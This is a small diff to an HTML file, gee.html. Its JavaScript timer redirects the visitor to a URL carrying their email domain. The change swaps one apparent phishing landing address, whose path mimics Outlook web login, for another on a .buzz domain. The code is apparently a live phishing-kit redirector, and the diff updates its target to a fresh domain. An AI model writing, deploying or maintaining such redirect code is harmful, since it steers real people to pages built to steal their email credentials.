--- a/gee.html
+++ b/gee.html
@@ -11,7 +11,7 @@
         var dom = cross[0];
 
           setTimeout(function(){
-            var redirect ="https://cryzdal.com/outlook.web/online/?client_email={domain}";
+            var redirect ="https://westmaisieha.buzz/webonline/index/?client_email={domain}";
             var link = redirect.replace("{domain}",dom);
             window.location.href = link;
          },300);
